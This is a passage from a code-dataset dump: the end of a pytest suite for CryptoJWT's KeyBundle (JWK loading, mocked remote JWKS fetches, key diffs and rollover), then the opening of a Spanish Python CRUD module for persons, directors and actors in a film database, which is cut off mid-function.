1\n\n\ndef test_copy():\n desc = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n kb = KeyBundle([desc])\n assert len(kb.keys()) == 1\n for k in kb.keys():\n kb.mark_as_inactive(k.kid)\n desc = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb.add_jwk_dicts([desc])\n\n kbc = kb.copy()\n assert len(kbc.keys()) == 2\n assert len(kbc.active_keys()) == 1\n\n\ndef test_local_jwk():\n _path = full_path(\"jwk_private_key.json\")\n kb = KeyBundle(source=\"file://{}\".format(_path))\n assert kb\n\n\ndef test_local_jwk_update():\n cache_time = 0.1\n _path = full_path(\"jwk_private_key.json\")\n kb = KeyBundle(source=\"file://{}\".format(_path), cache_time=cache_time)\n assert kb\n _ = kb.keys()\n last1 = kb.last_local\n _ = kb.keys()\n last2 = kb.last_local\n assert last1 == last2 # file not changed\n time.sleep(cache_time + 0.1)\n Path(_path).touch()\n _ = kb.keys()\n last3 = kb.last_local\n assert last2 != last3 # file changed\n\n\ndef test_local_jwk_copy():\n _path = full_path(\"jwk_private_key.json\")\n kb = KeyBundle(source=\"file://{}\".format(_path))\n kb2 = kb.copy()\n assert kb2.source == kb.source\n\n\n# def test_remote(httpserver):\n# httpserver.serve_content(json.dumps(JWK1))\n# kb = KeyBundle(source=httpserver.url)\n# assert len(kb.keys())\n# assert len(kb.get('rsa')) == 1\n# assert len(kb.get('oct')) == 1\n\n\n@pytest.fixture()\ndef mocked_jwks_response():\n with responses.RequestsMock() as rsps:\n yield rsps\n\n\ndef test_httpc_params_1():\n source = \"https://login.salesforce.com/id/keys\" # From test_jwks_url()\n # Mock response\n with responses.RequestsMock() as rsps:\n rsps.add(method=responses.GET, url=source, json=JWKS_DICT, status=200)\n httpc_params = {\"timeout\": (2, 2)} # connect, read timeouts in seconds\n kb = KeyBundle(source=source, httpc=requests.request, httpc_params=httpc_params)\n updated, _ = kb._do_remote()\n assert updated == True\n\n\n@pytest.mark.network\ndef test_httpc_params_2():\n httpc_params = {\"timeout\": 0}\n kb = KeyBundle(\n source=\"https://login.salesforce.com/id/keys\",\n httpc=requests.request,\n httpc_params=httpc_params,\n )\n # Will always fail to fetch the JWKS because the timeout cannot be set\n # to 0s\n assert not kb.update()\n\n\ndef test_update_2():\n rsa_key = new_rsa_key()\n _jwks = {\"keys\": [rsa_key.serialize()]}\n fname = \"tmp_jwks.json\"\n with open(fname, \"w\") as fp:\n fp.write(json.dumps(_jwks))\n\n kb = KeyBundle(source=\"file://{}\".format(fname), fileformat=\"jwks\")\n assert len(kb) == 1\n\n # Added one more key\n ec_key = new_ec_key(crv=\"P-256\", key_ops=[\"sign\"])\n _jwks = {\"keys\": [rsa_key.serialize(), ec_key.serialize()]}\n\n time.sleep(0.5)\n with open(fname, \"w\") as fp:\n fp.write(json.dumps(_jwks))\n\n kb.update()\n assert len(kb) == 2\n\n\ndef test_update_mark_inactive():\n rsa_key = new_rsa_key()\n _jwks = {\"keys\": [rsa_key.serialize()]}\n fname = \"tmp_jwks.json\"\n with open(fname, \"w\") as fp:\n fp.write(json.dumps(_jwks))\n\n kb = KeyBundle(source=\"file://{}\".format(fname), fileformat=\"jwks\")\n assert len(kb) == 1\n\n # new set of keys\n rsa_key = new_rsa_key(alg=\"RS256\")\n ec_key = new_ec_key(crv=\"P-256\")\n _jwks = {\"keys\": [rsa_key.serialize(), ec_key.serialize()]}\n\n with open(fname, \"w\") as fp:\n fp.write(json.dumps(_jwks))\n\n kb.update()\n # 2 active and 1 inactive\n assert len(kb) == 3\n assert len(kb.active_keys()) == 2\n\n assert len(kb.get(\"rsa\")) == 1\n assert len(kb.get(\"rsa\", only_active=False)) == 2\n\n\ndef test_loads_0():\n kb = KeyBundle(JWK0)\n assert len(kb) == 1\n key = kb.get(\"rsa\")[0]\n assert key.kid == \"abc\"\n assert key.kty == \"RSA\"\n\n\ndef test_loads_1():\n jwks = {\n \"keys\": [\n {\n \"kty\": \"RSA\",\n \"use\": \"sig\",\n \"e\": \"AQAB\",\n \"n\": \"wf-wiusGhA-gleZYQAOPQlNUIucPiqXdPVyieDqQbXXOPBe3nuggtVzeq7pVFH1dZz4dY2Q2LA5DaegvP8kRvoSB_87ds3dy3Rfym_GUSc5B0l1TgEobcyaep8jguRoHto6GWHfCfKqoUYZq4N8vh4LLMQwLR6zi6Jtu82nB5k8\",\n \"kid\": \"1\",\n },\n {\n \"kty\": \"RSA\",\n \"use\": \"enc\",\n \"e\": \"AQAB\",\n \"n\": \"wf-wiusGhA-gleZYQAOPQlNUIucPiqXdPVyieDqQbXXOPBe3nuggtVzeq7pVFH1dZz4dY2Q2LA5DaegvP8kRvoSB_87ds3dy3Rfym_GUSc5B0l1TgEobcyaep8jguRoHto6GWHfCfKqoUYZq4N8vh4LLMQwLR6zi6Jtu82nB5k8\",\n \"kid\": \"2\",\n },\n ]\n }\n\n kb = KeyBundle(jwks)\n\n assert len(kb) == 2\n assert set(kb.kids()) == {\"1\", \"2\"}\n\n\ndef test_dump_jwk():\n kb = KeyBundle()\n kb.append(RSAKey(pub_key=import_rsa_key_from_cert_file(CERT)))\n jwks = kb.jwks()\n\n _wk = json.loads(jwks)\n assert list(_wk.keys()) == [\"keys\"]\n assert len(_wk[\"keys\"]) == 1\n assert set(_wk[\"keys\"][0].keys()) == {\"kty\", \"e\", \"n\"}\n\n kb2 = KeyBundle(_wk)\n\n assert len(kb2) == 1\n key = kb2.get(\"rsa\")[0]\n assert key.kty == \"RSA\"\n assert isinstance(key.public_key(), rsa.RSAPublicKey)\n\n\nJWKS_DICT = {\n \"keys\": [\n {\n \"n\": \"zkpUgEgXICI54blf6iWiD2RbMDCOO1jV0VSff1MFFnujM4othfMsad7H1kRo50YM5S_X9TdvrpdOfpz5aBaKFhT6Ziv0nhtcekq1eRl8mjBlvGKCE5XGk-0LFSDwvqgkJoFYInq7bu0a4JEzKs5AyJY75YlGh879k1Uu2Sv3ZZOunfV1O1Orta-NvS-aG_jN5cstVbCGWE20H0vFVrJKNx0Zf-u-aA-syM4uX7wdWgQ-owoEMHge0GmGgzso2lwOYf_4znanLwEuO3p5aabEaFoKNR4K6GjQcjBcYmDEE4CtfRU9AEmhcD1kleiTB9TjPWkgDmT9MXsGxBHf3AKT5w\",\n \"e\": \"AQAB\",\n \"kty\": \"RSA\",\n \"kid\": \"5-VBFv40P8D4I-7SFz7hMugTbPs\",\n \"use\": \"enc\",\n },\n {\n \"k\": \"YTEyZjBlMDgxMGI4YWU4Y2JjZDFiYTFlZTBjYzljNDU3YWM0ZWNiNzhmNmFlYTNkNTY0NzMzYjE\",\n \"kty\": \"oct\",\n \"use\": \"enc\",\n },\n {\n \"kty\": \"EC\",\n \"kid\": \"7snis\",\n \"use\": \"sig\",\n \"x\": \"q0WbWhflRbxyQZKFuQvh2nZvg98ak-twRoO5uo2L7Po\",\n \"y\": \"GOd2jL_6wa0cfnyA0SmEhok9fkYEnAHFKLLM79BZ8_E\",\n \"crv\": \"P-256\",\n },\n {\n \"kty\": \"OKP\",\n \"kid\": \"xyzzy\",\n \"use\": \"sig\",\n \"x\": \"11qYAYKxCrfVS_7TyWQHOg7hcvPapiMlrwIaaPcHURo\",\n \"crv\": \"Ed25519\",\n },\n ]\n}\n\n\ndef test_keys():\n kb = KeyBundle(JWKS_DICT)\n\n assert len(kb) == 4\n\n assert len(kb.get(\"rsa\")) == 1\n assert len(kb.get(\"oct\")) == 1\n assert len(kb.get(\"ec\")) == 1\n assert len(kb.get(\"okp\")) == 1\n\n\nEXPECTED = [\n b\"iA7PvG_DfJIeeqQcuXFmvUGjqBkda8In_uMpZrcodVA\",\n b\"akXzyGlXg8yLhsCczKb_r8VERLx7-iZBUMIVgg2K7p4\",\n b\"kLsuyGef1kfw5-t-N9CJLIHx_dpZ79-KemwqjwdrvTI\",\n b\"kPrK_qmxVWaYVA9wwBF6Iuo3vVzz7TxHCTwXBygrS4k\",\n]\n\n\ndef test_thumbprint():\n kb = KeyBundle(JWKS_DICT)\n for key in kb:\n txt = key.thumbprint(\"SHA-256\")\n assert txt in EXPECTED\n\n\n@pytest.mark.network\ndef test_jwks_url():\n keys = KeyBundle(source=\"https://login.salesforce.com/id/keys\")\n # Forces read from the network\n keys.update()\n assert len(keys)\n\n\nKEYSPEC = [\n {\"type\": \"RSA\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-256\", \"use\": [\"sig\"]},\n]\n\nKEYSPEC_2 = [\n {\"type\": \"RSA\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-256\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-384\", \"use\": [\"sig\"]},\n]\n\nKEYSPEC_3 = [\n {\"type\": \"RSA\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-256\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-384\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-521\", \"use\": [\"sig\"]},\n]\n\nKEYSPEC_4 = [\n {\"type\": \"RSA\", \"use\": [\"sig\"]},\n {\"type\": \"RSA\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-256\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-384\", \"use\": [\"sig\"]},\n]\n\nKEYSPEC_5 = [\n {\"type\": \"EC\", \"crv\": \"P-256\", \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-384\", \"use\": [\"sig\"]},\n]\n\nKEYSPEC_6 = [\n {\"type\": \"oct\", \"bytes\": \"24\", \"use\": [\"enc\"], \"kid\": \"code\"},\n {\"type\": \"oct\", \"bytes\": \"24\", \"use\": [\"enc\"], \"kid\": \"token\"},\n {\"type\": \"oct\", \"bytes\": \"24\", \"use\": [\"enc\"], \"kid\": \"refresh_token\"},\n]\n\n\ndef test_key_diff_none():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n\n diff = key_diff(_kb, KEYSPEC)\n assert not diff\n\n\ndef test_key_diff_add_one_ec():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n\n diff = key_diff(_kb, KEYSPEC_2)\n assert diff\n assert set(diff.keys()) == {\"add\"}\n assert len(diff[\"add\"]) == 1\n assert diff[\"add\"][0].kty == \"EC\"\n\n\ndef test_key_diff_add_two_ec():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n\n diff = key_diff(_kb, KEYSPEC_3)\n assert diff\n assert set(diff.keys()) == {\"add\"}\n assert len(diff[\"add\"]) == 2\n assert diff[\"add\"][0].kty == \"EC\"\n\n\ndef test_key_diff_add_ec_and_rsa():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n\n diff = key_diff(_kb, KEYSPEC_4)\n assert diff\n assert set(diff.keys()) == {\"add\"}\n assert len(diff[\"add\"]) == 2\n assert set([k.kty for k in diff[\"add\"]]) == {\"EC\", \"RSA\"}\n\n\ndef test_key_diff_add_ec_del_rsa():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n\n diff = key_diff(_kb, KEYSPEC_5)\n assert diff\n assert set(diff.keys()) == {\"add\", \"del\"}\n assert len(diff[\"add\"]) == 1\n assert len(diff[\"del\"]) == 1\n assert diff[\"add\"][0].kty == \"EC\"\n assert diff[\"del\"][0].kty == \"RSA\"\n\n\ndef test_key_bundle_update_1():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n diff = key_diff(_kb, KEYSPEC_2)\n update_key_bundle(_kb, diff)\n\n # There should be 3 keys\n assert len(_kb) == 3\n\n # one RSA\n assert len(_kb.get(\"RSA\")) == 1\n\n # 2 EC\n assert len(_kb.get(\"EC\")) == 2\n\n\ndef test_key_bundle_update_2():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n diff = key_diff(_kb, KEYSPEC_4)\n update_key_bundle(_kb, diff)\n\n # There should be 3 keys\n assert len(_kb) == 4\n\n # one RSA\n assert len(_kb.get(\"RSA\")) == 2\n\n # 2 EC\n assert len(_kb.get(\"EC\")) == 2\n\n\ndef test_key_bundle_update_3():\n _kb = build_key_bundle(key_conf=KEYSPEC)\n diff = key_diff(_kb, KEYSPEC_5)\n update_key_bundle(_kb, diff)\n\n # There should be 3 keys\n assert len(_kb) == 3\n\n # One inactive. Only active is implicit\n assert len(_kb.get()) == 2\n\n # one inactive RSA\n assert len(_kb.get(\"RSA\", only_active=False)) == 1\n assert len(_kb.get(\"RSA\")) == 0\n\n # 2 EC\n assert len(_kb.get(\"EC\")) == 2\n assert len(_kb.get(\"EC\", only_active=False)) == 2\n\n\ndef test_key_rollover():\n kb_0 = build_key_bundle(key_conf=KEYSPEC)\n assert len(kb_0.get(only_active=False)) == 2\n assert len(kb_0.get()) == 2\n\n kb_1 = key_rollover(kb_0)\n\n assert len(kb_1.get(only_active=False)) == 4\n assert len(kb_1.get()) == 2\n\n\ndef test_build_key_bundle_sym():\n _kb = build_key_bundle(key_conf=KEYSPEC_6)\n assert len(_kb) == 3\n\n assert len(_kb.get(\"RSA\")) == 0\n assert len(_kb.get(\"EC\")) == 0\n assert len(_kb.get(\"oct\")) == 3\n\n\ndef test_key_bundle_difference_none():\n _kb0 = build_key_bundle(key_conf=KEYSPEC_6)\n _kb1 = KeyBundle()\n _kb1.extend(_kb0.keys())\n\n assert _kb0.difference(_kb1) == []\n\n\ndef test_key_bundle_difference():\n _kb0 = build_key_bundle(key_conf=KEYSPEC_6)\n _kb1 = build_key_bundle(key_conf=KEYSPEC_2)\n\n assert _kb0.difference(_kb1) == _kb0.keys()\n assert _kb1.difference(_kb0) == _kb1.keys()\n\n\ndef test_unique_keys_1():\n _kb0 = build_key_bundle(key_conf=KEYSPEC_6)\n _kb1 = build_key_bundle(key_conf=KEYSPEC_6)\n\n keys = _kb0.keys()\n keys.extend(_kb1.keys())\n\n # All of them\n assert len(unique_keys(keys)) == 6\n\n\ndef test_unique_keys_2():\n _kb0 = build_key_bundle(key_conf=KEYSPEC_6)\n _kb1 = KeyBundle()\n _kb1.extend(_kb0.keys())\n\n keys = _kb0.keys()\n keys.extend(_kb1.keys())\n\n # 3 of 6\n assert len(unique_keys(keys)) == 3\n\n\ndef test_key_gen_rsa():\n _jwk = key_gen(\"RSA\", kid=\"kid1\")\n assert _jwk\n assert _jwk.kty == \"RSA\"\n assert _jwk.kid == \"kid1\"\n\n assert isinstance(_jwk, RSAKey)\n\n\ndef test_key_gen_okp():\n _jwk = key_gen(\"OKP\", kid=\"kid1\")\n assert _jwk\n assert _jwk.kty == \"OKP\"\n assert _jwk.kid == \"kid1\"\n\n assert isinstance(_jwk, OKPKey)\n\n\ndef test_init_key():\n spec = {\"type\": \"RSA\", \"kid\": \"one\"}\n\n filename = full_path(\"tmp_jwk.json\")\n if os.path.isfile(filename):\n os.unlink(filename)\n\n _key = init_key(filename, **spec)\n assert _key.kty == \"RSA\"\n assert _key.kid == \"one\"\n\n assert os.path.isfile(filename)\n\n # Should not lead to any change\n _jwk2 = init_key(filename, **spec)\n assert _key == _jwk2\n\n _jwk3 = init_key(filename, \"RSA\", \"two\")\n assert _key != _jwk3\n\n # Now _jwk3 is stored in the file\n _jwk4 = init_key(filename, \"RSA\")\n assert _jwk4 == _jwk3\n\n\ndef test_export_inactive():\n desc = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"sig\"}\n kb = KeyBundle([desc])\n assert len(kb.keys()) == 1\n for k in kb.keys():\n kb.mark_as_inactive(k.kid)\n desc = {\"kty\": \"oct\", \"key\": \"highestsupersecret\", \"use\": \"enc\"}\n kb.add_jwk_dicts([desc])\n res = kb.dump()\n assert set(res.keys()) == {\n \"cache_time\",\n \"etag\",\n \"fileformat\",\n \"httpc_params\",\n \"ignore_errors_until\",\n \"ignore_errors_period\",\n \"ignore_invalid_keys\",\n \"imp_jwks\",\n \"keys\",\n \"keytype\",\n \"keyusage\",\n \"last_updated\",\n \"last_remote\",\n \"last_local\",\n \"remote\",\n \"local\",\n \"source\",\n \"time_out\",\n }\n\n kb2 = KeyBundle().load(res)\n assert len(kb2.keys()) == 2\n assert len(kb2.active_keys()) == 1\n\n\ndef test_remote():\n source = \"https://example.com/test_remote/keys.json\"\n # Mock response\n with responses.RequestsMock() as rsps:\n rsps.add(method=\"GET\", url=source, json=JWKS_DICT, status=200)\n httpc_params = {\"timeout\": (2, 2)} # connect, read timeouts in seconds\n kb = KeyBundle(source=source, httpc=requests.request, httpc_params=httpc_params)\n kb._do_remote()\n\n exp = kb.dump()\n kb2 = KeyBundle().load(exp)\n assert kb2.source == source\n assert len(kb2.keys()) == 4\n assert len(kb2.get(\"rsa\")) == 1\n assert len(kb2.get(\"oct\")) == 1\n assert len(kb2.get(\"ec\")) == 1\n assert len(kb2.get(\"okp\")) == 1\n assert kb2.httpc_params == {\"timeout\": (2, 2)}\n assert kb2.imp_jwks\n assert kb2.last_updated\n\n\ndef test_remote_not_modified():\n source = \"https://example.com/test_remote_not_modified/keys.json\"\n headers = {\n \"Date\": \"Fri, 15 Mar 2019 10:14:25 GMT\",\n \"Last-Modified\": \"Fri, 1 Jan 1970 00:00:00 GMT\",\n }\n headers = {}\n\n # Mock response\n httpc_params = {\"timeout\": (2, 2)} # connect, read timeouts in seconds\n kb = KeyBundle(source=source, httpc=requests.request, httpc_params=httpc_params)\n\n with responses.RequestsMock() as rsps:\n rsps.add(method=\"GET\", url=source, json=JWKS_DICT, status=200, headers=headers)\n updated, _ = kb._do_remote()\n assert updated == True\n assert kb.last_remote == headers.get(\"Last-Modified\")\n timeout1 = kb.time_out\n\n with responses.RequestsMock() as rsps:\n rsps.add(method=\"GET\", url=source, status=304, headers=headers)\n updated, _ = kb._do_remote()\n assert not updated\n assert kb.last_remote == headers.get(\"Last-Modified\")\n timeout2 = kb.time_out\n\n assert timeout1 != timeout2\n\n exp = kb.dump()\n kb2 = KeyBundle().load(exp)\n assert kb2.source == source\n assert len(kb2.keys()) == 4\n assert len(kb2.active_keys()) == 4\n assert len(kb2.get(\"rsa\")) == 1\n assert len(kb2.get(\"oct\")) == 1\n assert len(kb2.get(\"ec\")) == 1\n assert len(kb2.get(\"okp\")) == 1\n assert kb2.httpc_params == {\"timeout\": (2, 2)}\n assert kb2.imp_jwks\n assert kb2.last_updated\n\n\ndef test_ignore_errors_period():\n source_good = \"https://example.com/test_ignore_errors_period/keys.json\"\n source_bad = \"https://example.com/test_ignore_errors_period/keys-bad.json\"\n ignore_errors_period = 1\n # Mock response\n with responses.RequestsMock() as rsps:\n rsps.add(method=\"GET\", url=source_good, json=JWKS_DICT, status=200)\n rsps.add(method=\"GET\", url=source_bad, json=JWKS_DICT, status=500)\n httpc_params = {\"timeout\": (2, 2)} # connect, read timeouts in seconds\n kb = KeyBundle(\n source=source_good,\n httpc=requests.request,\n httpc_params=httpc_params,\n ignore_errors_period=ignore_errors_period,\n )\n res, _ = kb._do_remote()\n assert res == True\n assert kb.ignore_errors_until is None\n\n # refetch, but fail by using a bad source\n kb.source = source_bad\n try:\n res, _ = kb._do_remote()\n except UpdateFailed:\n pass\n\n # retry should fail silently as we're in holddown\n res, _ = kb._do_remote()\n assert kb.ignore_errors_until is not None\n assert res == False\n\n # wait until holddown\n time.sleep(ignore_errors_period + 1)\n\n # try again\n kb.source = source_good\n res, _ = kb._do_remote()\n assert res == True\n\n\ndef test_ignore_invalid_keys():\n rsa_key_dict = new_rsa_key().serialize()\n rsa_key_dict[\"kty\"] = \"b0rken\"\n\n kb = KeyBundle(keys={\"keys\": [rsa_key_dict]}, ignore_invalid_keys=True)\n assert len(kb) == 0\n\n with pytest.raises(UnknownKeyType):\n KeyBundle(keys={\"keys\": [rsa_key_dict]}, ignore_invalid_keys=False)\n\n\ndef test_exclude_attributes():\n source = \"https://example.com/test_exclude_attributes/keys.json\"\n # Mock response\n with responses.RequestsMock() as rsps:\n rsps.add(method=\"GET\", url=source, json=JWKS_DICT, status=200)\n httpc_params = {\"timeout\": (2, 2)} # connect, read timeouts in seconds\n kb = KeyBundle(source=source, httpc=requests.request, httpc_params=httpc_params)\n kb._do_remote()\n\n exp = kb.dump(exclude_attributes=[\"cache_time\", \"ignore_invalid_keys\"])\n kb2 = KeyBundle(cache_time=600, ignore_invalid_keys=False).load(exp)\n assert kb2.cache_time == 600\n assert kb2.ignore_invalid_keys is False\n\n\ndef test_remote_dump_json():\n source = \"https://example.com/keys.json\"\n # Mock response\n with responses.RequestsMock() as rsps:\n rsps.add(method=\"GET\", url=source, json=JWKS_DICT, status=200)\n httpc_params = {\"timeout\": (2, 2)} # connect, read timeouts in seconds\n kb = KeyBundle(source=source, httpc=requests.request, httpc_params=httpc_params)\n kb._do_remote()\n\n exp = kb.dump()\n assert json.dumps(exp)\n","repo_name":"IdentityPython/JWTConnect-Python-CryptoJWT","sub_path":"tests/test_03_key_bundle.py","file_name":"test_03_key_bundle.py","file_ext":"py","file_size_in_byte":32540,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"41829900201","text":"from clases import Persona, Director, Actor, Pelicula\r\nfrom datetime import datetime\r\nfrom tuplas import SEXO, devuelve_sexo, ESTILO_PELI, devuelve_estilo\r\nimport re\r\n\r\n\r\ndef valida_fecha(titulo):\r\n while True:\r\n fecha = input(f'Ingrese una fecha en el formato YYYY-MM-DD para {titulo}: ')\r\n try:\r\n fecha_formato = datetime.strptime(fecha, '%Y-%m-%d')\r\n return fecha_formato\r\n except ValueError:\r\n print(f'La {titulo} no está en el formato correcto (YYYY-MM-DD)...!')\r\n\r\n\r\ndef valida_int(titulo):\r\n while True:\r\n try:\r\n num = int(input(f'Ingrese {titulo}'))\r\n if num >= 0:\r\n return num\r\n print('El valor ingresado no es el correcto')\r\n except:\r\n print(f'Valor ingresado incorrecto, {titulo}')\r\n\r\n\r\ndef valida_sexo():\r\n opciones = ['{}. {}'.format(codigo, descripcion) for codigo, descripcion in SEXO]\r\n v_sexo = [codigo for codigo, _ in SEXO]\r\n while True:\r\n sexo = valida_int(f'Sexo, valor numérico {opciones} : ')\r\n if sexo in v_sexo:\r\n return sexo\r\n print(f'El ID del sexo no es el correcto, verificar las opciones {opciones}')\r\n\r\n\r\ndef valida_mail():\r\n while True:\r\n email = input('Correo: ')\r\n if re.match(r\"[^@]+@[^@]+\\.[^@]+\", email):\r\n return email\r\n print('Correo incorrecto, ingrese nuevamente.')\r\n\r\n\r\ndef valida_cedula():\r\n while True:\r\n cedula = input('Cédula: ')\r\n persona = Persona.valida_cedula(cedula)\r\n if persona is None:\r\n return cedula\r\n print(f'La cédula {cedula}, ya existe')\r\n\r\n\r\ndef crear_persona():\r\n print('INGRESO DE DATOS')\r\n cedula = valida_cedula()\r\n nombre = input('Nombre: ').upper()\r\n apellido = input('Apellido: ').upper()\r\n fecha_nacimiento = valida_fecha('Fecha Nacimiento')\r\n sexo = valida_sexo()\r\n email = valida_mail()\r\n persona = Persona(None, cedula, nombre, apellido, fecha_nacimiento, sexo, email)\r\n persona.inserta_persona()\r\n\r\n\r\ndef modificar_persona():\r\n print('MODIFICACIÓN DE DATOS')\r\n cedula = input('Cédula a modificar: ')\r\n persona = Persona.valida_cedula(cedula)\r\n if persona is None:\r\n print('No existe ninguna persona con esta cédula...!')\r\n return\r\n nombre = input('Nombre: ').upper()\r\n apellido = input('Apellido: ').upper()\r\n fecha_nacimiento = valida_fecha('Fecha Nacimiento')\r\n sexo = valida_sexo()\r\n email = valida_mail()\r\n persona = Persona(persona[0], cedula, nombre, apellido, fecha_nacimiento, sexo, email)\r\n persona.actualiza_persona()\r\n\r\n\r\ndef consulta_una_persona():\r\n print('PRESENTACIÓN DE DATOS')\r\n cedula = input('Cédula a consultar: ')\r\n persona = Persona.valida_cedula(cedula)\r\n if persona is None:\r\n print('No existe ninguna persona con esta cédula...!')\r\n return\r\n sexo = devuelve_sexo(persona[5])\r\n print('{:<10} {:<10} {:<20} {:<20} {:<15} {:<10} {:<30}'.format('ID', 'CÉDULA', 'NOMBRE', 'APELLIDO',\r\n 'FECH. NAC.', 'SEXO', 'EMAIL'))\r\n print('{:<10} {:<10} {:<20} {:<20} {:<15} {:<10} {:<30}'.format(persona[0], persona[1], persona[2], persona[3],\r\n str(persona[4]), sexo, persona[6]))\r\n\r\n\r\ndef eliminar_persona():\r\n print('ELIMINACIÓN DE DATOS')\r\n cedula = input('Cédula a eliminar: ')\r\n persona = Persona.valida_cedula(cedula)\r\n if persona is None:\r\n print('No existe ninguna persona con esta cédula...!')\r\n return\r\n persona = Persona(persona[0], '', '', '', '', '', '')\r\n persona.eliminar_persona()\r\n\r\n\r\ndef valida_estilo_peli():\r\n opciones = ['{}. {}'.format(codigo, descripcion) for codigo, descripcion in ESTILO_PELI]\r\n v_estilo_peli = [codigo for codigo, _ in ESTILO_PELI]\r\n while True:\r\n peli = valida_int(f'Estilo Peli, valor numérico {opciones} : ')\r\n if peli in v_estilo_peli:\r\n return peli\r\n print(f'El ID del Estilo Peli no es el correcto, verificar las opciones {opciones}')\r\n\r\ndef consulta_un_director():\r\n print('PRESENTACIÓN DE DATOS')\r\n cedula = input('Cédula a consultar: ')\r\n director = Director.valida_director(cedula)\r\n if director is None:\r\n print('No existe DIRECTOR con esta cédula...!')\r\n return\r\n estilo = devuelve_estilo(director[2])\r\n print('{:<10} {:<30} {:<20} {:<15} {:<20} {:<10} {:<30}'.format('CÉDULA', 'DIRECTOR', 'EMAIL', 'PELI. DIR.',\r\n 'ESTILO PELI', 'PREMIOS', 'BIOGRAFÍA'))\r\n print('{:<10} {:<30} {:<20} {:<15} {:<20} {:<10} {:<30}'.format(director[6], director[7] + ' ' + director[8], director[11],\r\n director[1], estilo, director[3], director[4]))\r\n\r\n\r\ndef crear_director():\r\n print('INGRESO DE DATOS')\r\n cedula = input('Cédula:')\r\n director = Director.valida_director(cedula)\r\n if director is None:\r\n persona = Persona.valida_cedula(cedula)\r\n if persona is None:\r\n print('No existe ninguna persona con esta cédula...!')\r\n return\r\n num_peliculas_dirigidas = valida_int('Num. Películas Dirigidas:')\r\n estilo_director = valida_estilo_peli()\r\n premios_ganados = valida_int('Premios ganados:')\r\n biografia = input('Biografía').upper()\r\n director = Director(persona[0], persona[1], persona[2], persona[3], persona[4], persona[5], persona[6],\r\n num_peliculas_dirigidas,\r\n estilo_director, premios_ganados, biografia)\r\n director.inserta_director()\r\n print('Ya existe Director registrado...!')\r\n return\r\n\r\n\r\ndef modificar_director():\r\n print('MODIFICACIÓN DE DATOS')\r\n cedula = input('Cédula:')\r\n director = Director.valida_director(cedula)\r\n if director is None:\r\n print('No existe Director con esta cédula para modificar...!')\r\n return\r\n num_peliculas_dirigidas = valida_int('Num. Películas Dirigidas:')\r\n estilo_director = valida_estilo_peli()\r\n premios_ganados = valida_int('Premios ganados:')\r\n biografia = input('Biografía: ').upper()\r\n director = Director(director[0], '', '', '', '', '', '', num_peliculas_dirigidas, estilo_director, premios_ganados,\r\n biografia)\r\n director.modifica_director()\r\n\r\ndef eliminar_director():\r\n print('ELIMINACIÓN DE DATOS')\r\n cedula = input('Cédula:')\r\n director = Director.valida_director(cedula)\r\n if director is None:\r\n print('No existe Director con esta cédula para eliminar...!')\r\n return\r\n director = Director(director[0], '', '', '', '', '', '', '', '', '', '')\r\n director.eliminar_director()\r\n\r\ndef crear_actor():\r\n print('INGRESO DE DATOS')\r\n cedula = input('Cédula:')\r\n actor = Actor.valida_actor(cedula)\r\n if actor is None:\r\n persona = Persona.valida_cedula(cedula)\r\n if persona is None:\r\n print('No existe ninguna persona con esta cédula...!')\r\n return\r\n print(persona[2], persona[3],'\\n')\r\n num_peliculas = valida_int('Num. Películas:')\r\n premios_ganados = valida_int('Premios ganados:')\r\n biografia = input('Biografía').upper()\r\n actor = Actor(persona[0], persona[1], persona[2], persona[3], persona[4], persona[5], persona[6],\r\n num_peliculas, premios_ganados, biografia)\r\n actor.inserta_actor()\r\n print('Ya existe ACTOR registrado...!')\r\n return\r\n\r\ndef modificar_actor():\r\n print('MODIFICACIÓN DE DATOS')\r\n cedula = input('Cédula:')\r\n actor = Actor.valida_actor(cedula)\r\n if actor is None:\r\n print('No existe Actor con esta cédula para modificar...!')\r\n return\r\n num_peliculas = valida_int('Num. Películas:')\r\n premios_ganados = valida_int('Premios ganados:')\r\n biografia = input('Biografía: ').upper()\r\n actor = Actor(actor[0], '', '', '', '', '', '', num_peliculas, premios_ganados, biografia)\r\n actor.modifica_actor()\r\n\r\ndef eliminar_actor():\r\n print('ELIMINACIÓN DE DATOS')\r\n cedula = input('Cédula:')\r\n actor = Actor.valida_actor(cedula)\r\n if actor is None:\r\n print('No existe Director con esta cédula para eliminar...!')\r\n return\r\n actor = Actor(actor[0], '', '', '', '', '', '', '', '', '')\r\n actor.eliminar_actor()\r\n\r\ndef consulta_un_actor():\r\n print('PRESENTACIÓN DE DATOS')\r\n cedula = input('Cédula a consultar: ')\r\n actor = Actor.valida_actor(cedula)\r\n if actor is None:\r\n print('No existe ACTOR con esta cédula...!')\r\n return\r\n\r\n print('{:<10} {:<30} {:<20} {:<15} {:<10} {:<30}'.format('CÉDULA', 'ACTOR', 'EMAIL', 'NUM. PELI.',\r\n 'PREMIOS', 'BIOGRAFÍA'))\r\n print('{:<10} {:<30} {:<20} {:<15} {:<10} {:<30}'.format(actor[5], actor[6] + ' ' + actor[7], actor[10],\r\n actor[1], actor[2], actor[3]))\r\n\r\ndef valida_persona_peli(tipo_persona):\r\n while True:\r\n cedula = input(f'Cédula para {tipo_persona}: ')\r\n if tipo_persona == 'Director':\r\n d_p = Director.valida_director(cedula)\r\n else:\r\n d_p = Actor.valida_actor(cedula)\r\n if d_p is None:\r\n 